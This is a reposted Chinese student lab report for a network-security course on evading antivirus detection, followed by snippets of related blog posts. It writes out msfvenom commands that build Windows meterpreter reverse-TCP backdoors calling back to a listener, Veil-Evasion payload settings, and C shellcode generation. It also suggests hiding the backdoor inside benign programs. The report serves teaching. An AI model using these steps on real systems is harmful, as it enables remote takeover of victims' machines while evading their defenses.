20145228《网络对抗技术》免杀原理与实践

最新推荐文章于 2025-09-10 15:16:07 发布
转载 最新推荐文章于 2025-09-10 15:16:07 发布 · 51 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/J000/p/6616779.html
文章标签:

#c/c++ #python #运维

本文介绍了免杀技术的基本原理及实践方法,包括使用msfvenom生成后门程序、利用Veil-Evasion规避检测及通过C语言调用Shellcode实现免杀。通过不同工具和技术的应用,展示了如何让恶意代码躲避杀毒软件的检测。

实验内容

•理解免杀技术原理

•正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

基础问题回答

(1)杀软是如何检测出恶意代码的?

1*恶意代码一般具有明显的特征码,依据特征码来判断是否是恶意代码

2*如果一个程序的行为是带有恶意的行为,也会被检测为恶意代码

(2)免杀是做什么?

免杀就是避免杀软的查杀与检测

(3)免杀的基本方法有哪些?

•改变特征码

•尽量避免杀软检测到带有恶意的行为,如使用反弹式连接

实验过程

实验过程中使用的是virscan来进行在线查毒,非常方便

msfvenom直接生成meterpreter可执行文件

·按照前一次实验的操作,用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.128 LPORT=5228 -f exe > 20145228.exe来生成一个后门程序

·然后利用ncat指令传送到主机

·最后检测结果:

887033-20170325122034361-1064896429.png

基本都可以发现这是个恶意代码

使用Veil-Evasion生成可执行文件

·Veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装

·直接输入veil-evasion打开

887033-20170325122047643-808046776.png

·然后依次键入以下指令:

use python/meterpreter/rev_tcp //设置payload

set LHOST 192.168.88.144 //设置反弹连接IP

set LPORT 5228 //设置反弹端口5228,默认为4444

generate //生成

145213 //程序名

887033-20170325122058033-1317040020.png

以结果图可知,该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里。

检测结果:

887033-20170325122105408-381656045.png

这次基本没几个能检测出来了

使用C语言调用Shellcode

•使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=5228 -f c命令生成一个C语言shellcode数组

887033-20170325122114502-904144136.png

•然后将这段数组在VC上进行编写shellcode

•在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。

887033-20170325122124049-1227009021.png

最后再去检测

887033-20170325122144424-645068072.png

附上我的杀软版本:

887033-20170325122153346-796385768.png

实验体会

清楚地了解了杀毒软件查杀的原理,如何使得自己的恶意代码免杀、恶意代码的伪装。一款杀软的检测并不能代表最后的结果

离实战还缺些什么技术或步骤

最重要的是后门的伪装,较好的方法是隐藏到一些非恶意程序里再进入目标主机

转载于:https://www.cnblogs.com/J000/p/6616779.html

红蓝对抗之红队开发实践
悦分享
08-04 2149
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dll和kernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
技术详解---白嫖党福音
01-15 1989
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到软waf这些大敌,当然主要还是软,因此我们不得不考虑进而实现我们渗透测试目的。 0x02 概念 2.1 类别 简单总结下我知道的类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描
20145203 盖泽双《网络对抗技术原理实践
03-26 245
20145203 盖泽双《网络对抗技术》拓展之原理实践 1.基础问题回答 (1)软是如何检测出恶意代码的? ①根据病毒的特征码 ②将可执行文件和收集的常见病毒库做对比。 ③观察可执行文件的行为。 (2)是做什么? 采取一些手段使我们的病毒程序注入到靶机时,不被毒软件检查出来。可以正常运行以便于我们成功控制靶机。 (3)的基本方法有哪些? 改变特征码 : ①加壳:压缩壳 ...
20145222《网络对抗原理实践
weixin_33958366的博客
04-01 172
20145222黄亚奇《网络对抗原理实践 知识点: 一、在一个已经感染了恶意代码的机器上如何找到病毒文件? 找到恶意代码才能对其分析,找到恶意代码文件就是就是分析的第一步,一般来讲,恶意代码运行必然会创建一个进程,而这个进程就是我们找到他的突破口,一个打开的进程,可以通过任务管理器、Process Explorer等来找到其映像文件的地址,这样就能找到恶意代码文件了 ...
20145322《网络对抗技术原理实践
03-26 165
20145322《网络对抗技术原理实践 基础问题回答 (1)软是如何检测出恶意代码的? 基于特征码的检测 再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。 (2)是做什么? 通过改变恶意程序的明显特征等信息已达到避毒软件查技术。 (3)的基本方法有哪些? 改变特征码 对恶意代码进行加壳,或用其他语言(如veil-evasion...
20155310《网络对抗原理实践
weixin_30725467的博客
04-11 135
20155310《网络对抗原理实践 基础问题回答 (1)软是如何检测出恶意代码的? 基于特征:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果毒软件检测到有程序包含的特征码其特征码库的代码相匹配,就会把该程序当作恶意软件。 基于行为:通过对恶意代码的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。所以当一个程序在运行时,毒软件会监视其行为,如果发现了这...
20145328 《网络对抗技术原理实践
weixin_34049948的博客
03-22 101
20145328 《网络对抗技术原理实践 实践内容: (1)理解技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等工具或技巧 (3)通过组合应用各种技术实现恶意代码 (4)用另一电脑实测,在软开启的情况下,可运行并回连成功,注明电脑的软名称版本 基础问题回答 (1)软是如何检测出恶意代码的? 毒软件对于恶意软件的检测...
原理实践
cyuyan3hao的博客
04-08 1358
网络对抗技术实验三
20145329 《网络对抗技术原理实践
dgflxcwno867930904的博客
03-26 205
实践内容: (1)理解技术原理(1分) (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等工具或技巧;(2分) (3)通过组合应用各种技术实现恶意代码(1分) (4)用另一电脑实测,在软开启的情况下,可运行并回连成功,注明电脑的软名称版本(1分) 1.基础问题回答 软是如何检测出恶意代码的? 1.通过对文件代码的特征检测 2.通过对...
网络对抗技术 20165220 Exp3 原理实践
weixin_30477797的博客
03-31 187
实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等工具或技巧; 2 通过组合应用各种技术实现恶意代码(1分)(如果成功实现了的,简单语言描述原理,不要截图。软共生的结果验证要截图。) 3 用另一电脑实测,在软开启的情况下,可运行并回连成功,注明电脑的软名称版本 基础问题回答 (1...
20145317 《网络对抗技术原理实践
weixin_30416871的博客
03-26 99
20145317 《网络对抗技术原理实践 技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码; 使用encode等进行编码,进行异或、+1、-1等类似操作改变特征码; 使用其他语言进行重写再编译,如veil-evasion。 改变攻击行为 反弹式连接能大大减少被阻止查的风险; 在正常应用软件中插入恶意代码; 将恶意代码加密,运行恶意代码后再解密进行恶...
20204323太晓梅 网络对抗技术 exp3 原理实践
m0_57567318的博客
03-30 367
但是黑客实现的手段和技术还是不断进步的,我们还需要提高自己的安全意识,及时更新自己的毒防护软件,才能有效应对被手段保护到的恶意程序。同时,由于技术的存在,我们也应该认识到毒软件并不能保障100%的安全,因此我们平时也要提高安全意识,不随便下载和点击来历不明的文件,谨防恶意代码的攻击。查看错误提示显示是文件未找到,初步推测应该是执行加密加壳的程序所在的文件夹无法找到作为模板去加壳的文件,于是把文件复制到hyperion所在的目录下,但是仍然显示找不到文件。此时就能成功进行操作了。
深入解析技术原理方法
3. **原理** - **混淆**:通过代码混淆技术改变原有代码结构,降低代码可读性,使软难以通过特征码匹配。 - **加密**:对恶意代码进行加密处理,使毒软件无法直接读取和分析代码逻辑。 - **变形**:动态...
C++20格式化字符串:std::format的使用实践
软件开发领域中最需要你关注的博主!
09-07 681
C++20之前的主要字符串格式化方法包括printf、sstream和boost.format,它们各有优缺点:printf简单但类型不安全,sstream类型安全但语法繁琐,boost.format功能强大但需额外依赖。C++20引入的std::format整合了这些方法的优点,提供现代、安全且灵活的解决方案,支持多种数据类型、自定义格式和日期时间格式化,语法类似Python,显著提升了代码的可读性和维护性。
C++标准库:字符串流类
weixin_50859396的博客
09-09 273
摘要:C++标准库中的字符串流类(<sstream>)提供了字符串其他数据类型间的灵活转换功能,包含三类核心流:istringstream(输入流)、ostringstream(输出流)和stringstream(双向流)。这些类支持数据的格式化拼接、解析及类型转换,常用于日志生成、配置解析等场景。使用时需注意状态清除(clear())和内容清空(str("")),并可通过iomanip实现格式化控制。字符串流是内存I/O操作的核心工具,兼具高效灵活性。
【C++】六个默认成员函数(下)
tangsl1552的博客
09-07 1284
本文介绍了C++运算符重载的核心概念。运算符重载通过定义特殊函数(如operator+)为类类型对象赋予运算能力,需遵循特定规则:函数名以operator开头、必须包含类类型参数、不能改变内置运算符含义。重点讲解了流插入/提取运算符(<<、>>)的全局重载方法,需配合友元函数访问私有成员;详细分析了赋值运算符重载的参数传递、返回值优化和自赋值检查;区分了拷贝构造赋值重载的使用场景;还介绍了const成员函数对this指针的修饰作用,以及取地址运算符重载的注意事项。编译器会为未显式定
C语言深度入门系列:第八篇 - 结构体、联合体枚举:程序世界的复合数据类型大师
最新发布
而世之奇伟、瑰怪,非常之观,常在于险远,而人之所罕至焉,故非有志者不能至也!
09-10 442
复合数据类型是C语言程序设计的高级特性,掌握了它们,您就能够构建出复杂而高效的数据结构,为实现大型程序打下坚实基础。这些概念在后续学习数据结构、算法以及系统编程时将发挥重要作用。
C++ 学习 CLion 使用:(十三)分别提供了 CLion 中使用 cout 和 cin 中文乱码的问题
qq_51409113的博客
09-10 244
分别提供了 CLion 中使用 cout 和 cin 中文乱码的问题
C++设计模式,高级开发,算法原理实战,系统设计实战(视频教程)
闲余知道
09-10 585
C++设计模式,高级开发,算法原理实战,系统设计实战(视频教程)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值